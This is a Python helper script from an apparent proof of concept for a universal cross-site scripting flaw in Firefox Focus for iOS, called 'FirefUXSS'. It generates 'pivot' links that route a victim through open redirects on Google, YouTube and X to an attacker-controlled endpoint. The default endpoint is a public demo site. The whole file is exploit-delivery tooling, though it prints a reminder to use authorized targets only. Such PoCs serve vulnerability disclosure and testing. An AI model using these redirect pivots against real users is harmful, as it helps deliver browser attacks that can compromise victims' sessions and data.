#!/usr/bin/env python3 """Generate pivot links used in the FirefUXSS Firefox Focus iOS PoC.""" from __future__ import annotations import argparse from urllib.parse import quote def build_pivot_links(attacker_url: str) -> dict[str, str]: """Return redirect-based pivot links for major origins used by the PoC.""" encoded = quote(attacker_url, safe="") return { "google": ( "https://www.google.com/url" f"?q={encoded}&sa=D&sntz=1&usg=AOvVaw1uB0j5rrgN2xkfoBgA9G0T" ), "youtube": f"https://www.youtube.com/redirect?q={encoded}", "x": f"https://x.com/safety/unsafe_link_warning?unsafe_link={encoded}", } def main() -> None: parser = argparse.ArgumentParser( description="Generate FirefUXSS pivot URLs for authorized testing." ) parser.add_argument( "--attacker-url", default="https://firefoxuxss.v12.sh/poc.php?redirect=1", help="Attacker-controlled PoC endpoint (default: public demo endpoint)", ) args = parser.parse_args() links = build_pivot_links(args.attacker_url) print("[+] Generated FirefUXSS pivot links:") for name, url in links.items(): print(f" - {name}: {url}") print("\n[!] Open one URL in Firefox Focus for iOS using authorized test targets only.") if __name__ == "__main__": main()